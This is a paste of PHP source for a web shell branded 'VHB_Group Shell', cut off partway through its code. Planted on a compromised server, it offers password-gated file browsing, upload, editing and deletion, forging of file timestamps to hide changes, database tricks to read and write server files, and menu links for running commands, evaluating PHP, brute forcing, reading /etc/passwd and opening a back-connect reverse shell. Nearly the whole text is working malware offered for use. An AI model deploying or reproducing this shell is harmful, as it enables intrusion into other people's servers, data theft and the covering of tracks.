· 10 years ago · Nov 17, 2015, 06:21 AM
1<?php
2
3/****************************************\
4
5|* VHB_Group Shell - VERSION 9.9 *|
6
7|* Edit & Develop by Mr.Soleil VHB_Group *|
8
9|* http://vhbgroup.net/ *|
10
11|* == Hacking & Security $ Programming == *|
12
13\****************************************/
14
15
16
17error_reporting(7);
18
19@set_magic_quotes_runtime(0);
20
21ob_start();
22
23$mtime = explode(' ', microtime());
24
25$starttime = $mtime[1] + $mtime[0];
26
27define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
28
29//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
30
31define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
32
33define('IS_COM', class_exists('COM') ? 1 : 0 );
34
35define('IS_GPC', get_magic_quotes_gpc());
36
37$dis_func = get_cfg_var('disable_functions');
38
39define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
40
41@set_time_limit(0);
42
43
44
45foreach(array('_GET','_POST') as $_request) {
46
47 foreach($$_request as $_key => $_value) {
48
49 if ($_key{0} != '_') {
50
51 if (IS_GPC) {
52
53 $_value = s_array($_value);
54
55 }
56
57 $$_key = $_value;
58
59 }
60
61 }
62
63}
64
65
66
67/*================= Info Login ================*/
68
69$admin = array();
70
71$admin['check'] = true;
72
73$admin['pass'] = 'vhb'; // Password login
74
75$admin['cookiepre'] = '';
76
77$admin['cookiedomain'] = '';
78
79$admin['cookiepath'] = '/';
80
81$admin['cookielife'] = 86400;
82
83/*===================== End =====================*/
84
85
86
87if ($charset == 'utf8') {
88
89 header("content-Type: text/html; charset=utf-8");
90
91} elseif ($charset == 'big5') {
92
93 header("content-Type: text/html; charset=big5");
94
95} elseif ($charset == 'gbk') {
96
97 header("content-Type: text/html; charset=gbk");
98
99} elseif ($charset == 'latin1') {
100
101 header("content-Type: text/html; charset=iso-8859-2");
102
103}
104
105
106
107$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
108
109$timestamp = time();
110
111
112
113/*===================== Login =====================*/
114
115if ($action == "logout") {
116
117 scookie('vbapass', '', -86400 * 365);
118
119 p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
120
121 p('<body background=http://i1124.photobucket.com/albums/l575/givay/th_matrix.gif>');
122
123 exit;
124
125}
126
127if($admin['check']) {
128 if ($doing == 'login') {
129 if ($admin['pass'] == $password) {
130 scookie('vbapass', $password);
131 } else {
132 $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
133 echo $err_mess;
134 }
135 }
136 if ($_COOKIE['vbapass']) {
137 if ($_COOKIE['vbapass'] != $admin['pass']) {
138 loginpage();
139 }
140 } else {
141 loginpage();
142 }
143}
144
145/*===================== Login =====================*/
146
147$errmsg = '';
148
149if ($action == 'phpinfo') {
150 if (IS_PHPINFO) {
151 phpinfo();
152 } else {
153 $errmsg = 'phpinfo() function has non-permissible';
154 }
155}
156
157
158if ($doing == 'downfile' && $thefile) {
159 if (!@file_exists($thefile)) {
160 $errmsg = 'The file you want Downloadable was nonexistent';
161 } else {
162 $fileinfo = pathinfo($thefile);
163 header('Content-type: application/x-'.$fileinfo['extension']);
164 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
165 header('Content-Length: '.filesize($thefile));
166 @readfile($thefile);
167 exit;
168 }
169}
170
171
172if ($doing == 'backupmysql' && !$saveasfile) {
173 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
174 $table = array_flip($table);
175 $result = q("SHOW tables");
176 if (!$result) p('<h2>'.mysql_error().'</h2>');
177 $filename = basename($_SERVER['HTTP_HOST'].'sql.gz');
178 header('Content-type: application/unknown');
179 header('Content-Disposition: attachment; filename='.$filename);
180 $mysqldata = '';
181 while ($currow = mysql_fetch_array($result)) {
182 if (isset($table[$currow[0]])) {
183 $mysqldata .= sqldumptable($currow[0]);
184 }
185 }
186 mysql_close();
187 exit;
188}
189
190
191// Mysql
192
193if($doing=='mysqldown'){
194 if (!$dbname) {
195 $errmsg = 'Please input dbname';
196 } else {
197 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
198 if (!file_exists($mysqldlfile)) {
199 $errmsg = 'The file you want Downloadable was nonexistent';
200 } else {
201 $result = q("select load_file('$mysqldlfile');");
202 if(!$result){
203 q("DROP TABLE IF EXISTS tmp_angel;");
204 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
205 //Download SQL
206 q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
207 $result = q("select content from tmp_angel");
208 q("DROP TABLE tmp_angel");
209 }
210 $row = @mysql_fetch_array($result);
211 if (!$row) {
212 $errmsg = 'Load file failed '.mysql_error();
213 } else {
214 $fileinfo = pathinfo($mysqldlfile);
215 header('Content-type: application/x-'.$fileinfo['extension']);
216 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
217 header("Accept-Length: ".strlen($row[0]));
218 echo $row[0];
219 exit;
220 }
221 }
222 }
223}
224
225?>
226
227<html>
228
229<head>
230
231<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
232
233<title><?php echo str_replace('.','','Mr.Soleil - VHB_Group');?></title>
234
235<style type="text/css">
236
237body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
238
239
240
241a {color: #74A202;text-decoration:none;}
242
243a:hover{color: #f00;text-decoration:underline;}
244
245.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
246
247.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
248
249.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
250
251.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
252
253.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
254
255.head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
256
257.head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
258
259.head td span{font-weight:normal;}
260
261form{margin:0;padding:0;}
262
263h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
264
265ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
266
267u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
268
269input, textarea, button
270
271{
272
273 font-size: 9pt;
274
275 color: #ccc;
276
277 font-family: verdana, sans-serif;
278
279 background-color: #202020;
280
281 border-left: 1px solid #74A202;
282
283 border-top: 1px solid #74A202;
284
285 border-right: 1px solid #74A202;
286
287 border-bottom: 1px solid #74A202;
288
289}
290
291select
292
293{
294
295 font-size: 8pt;
296
297 font-weight: normal;
298
299 color: #ccc;
300
301 font-family: verdana, sans-serif;
302
303 background-color: #202020;
304
305}
306
307
308
309</style>
310
311<script type="text/javascript">
312
313function CheckAll(form) {
314
315 for(var i=0;i<form.elements.length;i++) {
316
317 var e = form.elements[i];
318
319 if (e.name != 'chkall')
320
321 e.checked = form.chkall.checked;
322
323 }
324
325}
326
327function $(id) {
328
329 return document.getElementById(id);
330
331}
332
333function goaction(act){
334
335 $('goaction').action.value=act;
336
337 $('goaction').submit();
338
339}
340
341</script>
342
343</head>
344
345<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i1124.photobucket.com/albums/l575/givay/th_matrix.gif>
346
347
348
349
350
351<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
352
353 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
354
355 <tr>
356
357 <td align="center" valign=center>
358
359 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
360
361 Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
362
363 </div>
364
365 </td>
366
367 </tr>
368
369 </table>
370
371</div>
372
373 <script>
374
375 var ld=(document.all);
376
377 var ns4=document.layers;
378
379 var ns6=document.getElementById&&!document.all;
380
381 var ie4=document.all;
382
383 if (ns4)
384
385 ld=document.loading;
386
387 else if (ns6)
388
389 ld=document.getElementById("loading").style;
390
391 else if (ie4)
392
393 ld=document.all.loading.style;
394
395 function init()
396
397 {
398
399 if(ns4){ld.visibility="hidden";}
400
401 else if (ns6||ie4) ld.display="none";
402
403 }
404
405 </script>
406
407
408
409
410
411
412
413
414
415<table width="100%" border="0" cellpadding="0" cellspacing="0">
416
417 <tr class="head_small">
418
419 <td width=100%>
420
421 <table width=100%><tr class="head_small"><td width=86px><a title="Mr.Soleil - VHB_Group" href="<?php $self;?>"><img src=http://nm9.upanh.com/b5.s29.d4/7d50ce02133954905afcdd33e186f309_44953139.images1.jpg width="106" height=86 border=0></a></td>
422
423 <td>
424
425 <span style="float:right;"> <?php echo "Hostname: ".$_SERVER['HTTP_HOST']."";?> | <a href="#" target="_blank"><a href="#" target="_blank"><?php echo str_replace('.','','[Fuck-by:Mr.Soleil VHB_Group]');?></a> [wWw]</a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span>
426
427
428
429 <?php
430
431 $curl_on = @function_exists('curl_version');
432
433 $mysql_on = @function_exists('mysql_connect');
434
435 $mssql_on = @function_exists('mssql_connect');
436
437 $pg_on = @function_exists('pg_connect');
438
439 $ora_on = @function_exists('ocilogon');
440
441
442
443echo (($safe_mode)?("Safe_mod: <b><font color=green>ON</font></b> - "):("Safe_mod: <b><font color=red>OFF</font></b> - "));
444
445echo "PHP version: <b>".@phpversion()."</b> - ";
446
447 echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b> - "):("<b><font color=red>OFF</font></b> - "));
448
449 echo "MySQL: <b>";
450
451$mysql_on = @function_exists('mysql_connect');
452
453if($mysql_on){
454
455echo "<font color=green>ON</font></b> - "; } else { echo "<font color=red>OFF</font></b> - "; }
456
457echo "MSSQL: <b>";
458
459$mssql_on = @function_exists('mssql_connect');
460
461if($mssql_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
462
463echo "PostgreSQL: <b>";
464
465$pg_on = @function_exists('pg_connect');
466
467if($pg_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
468
469echo "Oracle: <b>";
470
471$ora_on = @function_exists('ocilogon');
472
473if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b><BR>";}
474
475
476
477echo "Disable functions : <b>";
478
479if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}
480
481
482
483echo "<font color=white>Uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";
484
485echo "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";
486
487 ?> </td>
488
489 </tr></table></td>
490
491 </tr>
492
493 <tr class="alt1">
494
495 <td width=100%><span style="float:right;">[Server IP: <?php echo "<font color=yellow>".gethostbyname($_SERVER['SERVER_NAME'])."</font>";?> - Your IP: <?php echo "<font color=yellow>".$_SERVER['REMOTE_ADDR']."</font>";?>] </span>
496
497
498
499 <a href="javascript:goaction('file');">File Manager</a> |
500
501 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
502
503 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
504
505 <a href="javascript:goaction('shell');">Execute Command</a> |
506
507 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
508
509 <a href="javascript:goaction('eval');">Eval PHP Code</a>
510
511 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('brute');">Brute</a> <?php }?>
512
513 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php }?>
514
515 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
516
517 </td>
518
519 </tr>
520
521</table>
522
523<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
524
525<?php
526
527
528
529formhead(array('name'=>'goaction'));
530
531makehide('action');
532
533formfoot();
534
535
536
537$errmsg && m($errmsg);
538
539
540
541// Dir function
542
543!$dir && $dir = '.';
544
545$nowpath = getPath(SA_ROOT, $dir);
546
547if (substr($dir, -1) != '/') {
548
549 $dir = $dir.'/';
550
551}
552
553$uedir = ue($dir);
554
555
556
557if (!$action || $action == 'file') {
558
559
560
561 // Non-writeable
562
563 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
564
565
566
567 // Delete dir
568
569 if ($doing == 'deldir' && $thefile) {
570
571 if (!file_exists($thefile)) {
572
573 m($thefile.' directory does not exist');
574
575 } else {
576
577 m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
578
579 }
580
581 }
582
583
584
585 // Create new dir
586
587 elseif ($newdirname) {
588
589 $mkdirs = $nowpath.$newdirname;
590
591 if (file_exists($mkdirs)) {
592
593 m('Directory has already existed');
594
595 } else {
596
597 m('Directory created '.(@mkdir($mkdirs,0755) ? 'success' : 'failed'));
598
599 @chmod($mkdirs,0755);
600
601 }
602
603 }
604
605
606
607 // Upload file
608
609 elseif ($doupfile) {
610
611 m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
612
613 }
614
615
616
617 // Edit file
618
619 elseif ($editfilename && $filecontent) {
620
621 $fp = @fopen($editfilename,'w');
622
623 m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
624
625 @fclose($fp);
626
627 }
628
629
630
631 // Modify
632
633 elseif ($pfile && $newperm) {
634
635 if (!file_exists($pfile)) {
636
637 m('The original file does not exist');
638
639 } else {
640
641 $newperm = base_convert($newperm,8,10);
642
643 m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
644
645 }
646
647 }
648
649
650
651 // Rename
652
653 elseif ($oldname && $newfilename) {
654
655 $nname = $nowpath.$newfilename;
656
657 if (file_exists($nname) || !file_exists($oldname)) {
658
659 m($nname.' has already existed or original file does not exist');
660
661 } else {
662
663 m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
664
665 }
666
667 }
668
669
670
671 // Copu
672
673 elseif ($sname && $tofile) {
674
675 if (file_exists($tofile) || !file_exists($sname)) {
676
677 m('The goal file has already existed or original file does not exist');
678
679 } else {
680
681 m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
682
683 }
684
685 }
686
687
688
689 // File exit
690
691 elseif ($curfile && $tarfile) {
692
693 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
694
695 m('The goal file has already existed or original file does not exist');
696
697 } else {
698
699 $time = @filemtime($tarfile);
700
701 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
702
703 }
704
705 }
706
707
708
709 // Date
710
711 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
712
713 if (!@file_exists($curfile)) {
714
715 m(basename($curfile).' does not exist');
716
717 } else {
718
719 $time = strtotime("$year-$month-$day $hour:$minute:$second");
720
721 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
722
723 }
724
725 }
726
727
728
729 // Download
730
731 elseif($doing == 'downrar') {
732
733 if ($dl) {
734
735 $dfiles='';
736
737 foreach ($dl as $filepath => $value) {
738
739 $dfiles.=$filepath.',';
740
741 }
742
743 $dfiles=substr($dfiles,0,strlen($dfiles)-1);
744
745 $dl=explode(',',$dfiles);
746
747 $zip=new PHPZip($dl);
748
749 $code=$zip->out;
750
751 header('Content-type: application/octet-stream');
752
753 header('Accept-Ranges: bytes');
754
755 header('Accept-Length: '.strlen($code));
756
757 header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'sql.gz');
758
759 echo $code;
760
761 exit;
762
763 } else {
764
765 m('Please select file(s)');
766
767 }
768
769 }
770
771
772
773 // Delete file
774
775 elseif($doing == 'delfiles') {
776
777 if ($dl) {
778
779 $dfiles='';
780
781 $succ = $fail = 0;
782
783 foreach ($dl as $filepath => $value) {
784
785 if (@unlink($filepath)) {
786
787 $succ++;
788
789 } else {
790
791 $fail++;
792
793 }
794
795 }
796
797 m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail);
798
799 } else {
800
801 m('Please select file(s)');
802
803 }
804
805 }
806
807
808
809 // Function Newdir
810
811 formhead(array('name'=>'createdir'));
812
813 makehide('newdirname');
814
815 makehide('dir',$nowpath);
816
817 formfoot();
818
819 formhead(array('name'=>'fileperm'));
820
821 makehide('newperm');
822
823 makehide('pfile');
824
825 makehide('dir',$nowpath);
826
827 formfoot();
828
829 formhead(array('name'=>'copyfile'));
830
831 makehide('sname');
832
833 makehide('tofile');
834
835 makehide('dir',$nowpath);
836
837 formfoot();
838
839 formhead(array('name'=>'rename'));
840
841 makehide('oldname');
842
843 makehide('newfilename');
844
845 makehide('dir',$nowpath);
846
847 formfoot();
848
849 formhead(array('name'=>'fileopform'));
850
851 makehide('action');
852
853 makehide('opfile');
854
855 makehide('dir');
856
857 formfoot();
858
859
860
861 $free = @disk_free_space($nowpath);
862
863 !$free && $free = 0;
864
865 $all = @disk_total_space($nowpath);
866
867 !$all && $all = 0;
868
869 $used = $all-$free;
870
871 $used_percent = @round(100/($all/$free),2);
872
873 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>'.sizecount($free).'</font> of <font color=red>'.sizecount($all).'</font> (<font color=red>'.$used_percent.'</font>%)</font>');
874
875
876
877?>
878
879<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
880
881 <form action="" method="post" id="godir" name="godir">
882
883 <tr>
884
885 <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
886
887 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
888
889 <td nowrap><input class="bt" value="GO" type="submit"></td>
890
891 </tr>
892
893 </form>
894
895</table>
896
897<script type="text/javascript">
898
899function createdir(){
900
901 var newdirname;
902
903 newdirname = prompt('Please input the directory name:', '');
904
905 if (!newdirname) return;
906
907 $('createdir').newdirname.value=newdirname;
908
909 $('createdir').submit();
910
911}
912
913function fileperm(pfile){
914
915 var newperm;
916
917 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
918
919 if (!newperm) return;
920
921 $('fileperm').newperm.value=newperm;
922
923 $('fileperm').pfile.value=pfile;
924
925 $('fileperm').submit();
926
927}
928
929function copyfile(sname){
930
931 var tofile;
932
933 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
934
935 if (!tofile) return;
936
937 $('copyfile').tofile.value=tofile;
938
939 $('copyfile').sname.value=sname;
940
941 $('copyfile').submit();
942
943}
944
945function rename(oldname){
946
947 var newfilename;
948
949 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
950
951 if (!newfilename) return;
952
953 $('rename').newfilename.value=newfilename;
954
955 $('rename').oldname.value=oldname;
956
957 $('rename').submit();
958
959}
960
961function dofile(doing,thefile,m){
962
963 if (m && !confirm(m)) {
964
965 return;
966
967 }
968
969 $('filelist').doing.value=doing;
970
971 if (thefile){
972
973 $('filelist').thefile.value=thefile;
974
975 }
976
977 $('filelist').submit();
978
979}
980
981function createfile(nowpath){
982
983 var filename;
984
985 filename = prompt('Please input the file name:', '');
986
987 if (!filename) return;
988
989 opfile('editfile',nowpath + filename,nowpath);
990
991}
992
993function opfile(action,opfile,dir){
994
995 $('fileopform').action.value=action;
996
997 $('fileopform').opfile.value=opfile;
998
999 $('fileopform').dir.value=dir;
1000
1001 $('fileopform').submit();
1002
1003}
1004
1005function godir(dir,view_writable){
1006
1007 if (view_writable) {
1008
1009 $('godir').view_writable.value=1;
1010
1011 }
1012
1013 $('godir').dir.value=dir;
1014
1015 $('godir').submit();
1016
1017}
1018
1019</script>
1020
1021 <?php
1022
1023 tbhead();
1024
1025 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
1026
1027 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
1028
1029 p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
1030
1031 if ($view_writable) {
1032
1033 p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
1034
1035 } else {
1036
1037 p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
1038
1039 }
1040
1041 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
1042
1043 if (IS_WIN && IS_COM) {
1044
1045 $obj = new COM('scripting.filesystemobject');
1046
1047 if ($obj && is_object($obj)) {
1048
1049 $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
1050
1051 foreach($obj->Drives as $drive) {
1052
1053 if ($drive->DriveType == 2) {
1054
1055 p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).' Free:'.sizecount($drive->FreeSpace).' Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
1056
1057 } else {
1058
1059 p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
1060
1061 }
1062
1063 }
1064
1065 }
1066
1067 }
1068
1069
1070
1071 p('</td></tr></form>');
1072
1073
1074
1075 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
1076
1077
1078
1079 // Get path
1080
1081 $dirdata=array();
1082
1083 $filedata=array();
1084
1085
1086
1087 if ($view_writable) {
1088
1089 $dirdata = GetList($nowpath);
1090
1091 } else {
1092
1093 // Open dir
1094
1095 $dirs=@opendir($dir);
1096
1097 while ($file=@readdir($dirs)) {
1098
1099 $filepath=$nowpath.$file;
1100
1101 if(@is_dir($filepath)){
1102
1103 $dirdb['filename']=$file;
1104
1105 $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
1106
1107 $dirdb['dirchmod']=getChmod($filepath);
1108
1109 $dirdb['dirperm']=getPerms($filepath);
1110
1111 $dirdb['fileowner']=getUser($filepath);
1112
1113 $dirdb['dirlink']=$nowpath;
1114
1115 $dirdb['server_link']=$filepath;
1116
1117 $dirdb['client_link']=ue($filepath);
1118
1119 $dirdata[]=$dirdb;
1120
1121 } else {
1122
1123 $filedb['filename']=$file;
1124
1125 $filedb['size']=sizecount(@filesize($filepath));
1126
1127 $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
1128
1129 $filedb['filechmod']=getChmod($filepath);
1130
1131 $filedb['fileperm']=getPerms($filepath);
1132
1133 $filedb['fileowner']=getUser($filepath);
1134
1135 $filedb['dirlink']=$nowpath;
1136
1137 $filedb['server_link']=$filepath;
1138
1139 $filedb['client_link']=ue($filepath);
1140
1141 $filedata[]=$filedb;
1142
1143 }
1144
1145 }// while
1146
1147 unset($dirdb);
1148
1149 unset($filedb);
1150
1151 @closedir($dirs);
1152
1153 }
1154
1155 @sort($dirdata);
1156
1157 @sort($filedata);
1158
1159 $dir_i = '0';
1160
1161 foreach($dirdata as $key => $dirdb){
1162
1163 if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
1164
1165 $thisbg = bg();
1166
1167 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1168
1169 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
1170
1171 p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
1172
1173 p('<td nowrap>'.$dirdb['mtime'].'</td>');
1174
1175 p('<td nowrap>--</td>');
1176
1177 p('<td nowrap>');
1178
1179 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
1180
1181 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
1182
1183 p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
1184
1185 p('</tr>');
1186
1187 $dir_i++;
1188
1189 } else {
1190
1191 if($dirdb['filename']=='..') {
1192
1193 p('<tr class=fout>');
1194
1195 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
1196
1197 p('</tr>');
1198
1199 }
1200
1201 }
1202
1203 }
1204
1205
1206
1207 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
1208
1209 p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
1210
1211 makehide('action','file');
1212
1213 makehide('thefile');
1214
1215 makehide('doing');
1216
1217 makehide('dir',$nowpath);
1218
1219 $file_i = '0';
1220
1221 foreach($filedata as $key => $filedb){
1222
1223 if($filedb['filename']!='..' && $filedb['filename']!='.') {
1224
1225 $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
1226
1227 $thisbg = bg();
1228
1229 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1230
1231 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
1232
1233 p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
1234
1235 p('<td nowrap>'.$filedb['mtime'].'</td>');
1236
1237 p('<td nowrap>'.$filedb['size'].'</td>');
1238
1239 p('<td nowrap>');
1240
1241 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
1242
1243 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
1244
1245 p('<td nowrap>');
1246
1247 p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
1248
1249 p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
1250
1251 p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
1252
1253 p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
1254
1255 p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
1256
1257 p('</td></tr>');
1258
1259 $file_i++;
1260
1261 }
1262
1263 }
1264
1265 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
1266
1267 p('</form></table>');
1268
1269}// end dir
1270
1271
1272
1273elseif ($action == 'sqlfile') {
1274
1275 if($doing=="mysqlupload"){
1276
1277 $file = $_FILES['uploadfile'];
1278
1279 $filename = $file['tmp_name'];
1280
1281 if (file_exists($savepath)) {
1282
1283 m('The goal file has already existed');
1284
1285 } else {
1286
1287 if(!$filename) {
1288
1289 m('Please choose a file');
1290
1291 } else {
1292
1293 $fp=@fopen($filename,'r');
1294
1295 $contents=@fread($fp, filesize($filename));
1296
1297 @fclose($fp);
1298
1299 $contents = bin2hex($contents);
1300
1301 if(!$upname) $upname = $file['name'];
1302
1303 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
1304
1305 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
1306
1307 m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
1308
1309 }
1310
1311 }
1312
1313 }
1314
1315?>
1316
1317<script type="text/javascript">
1318
1319function mysqlfile(doing){
1320
1321 if(!doing) return;
1322
1323 $('doing').value=doing;
1324
1325 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
1326
1327 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
1328
1329 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
1330
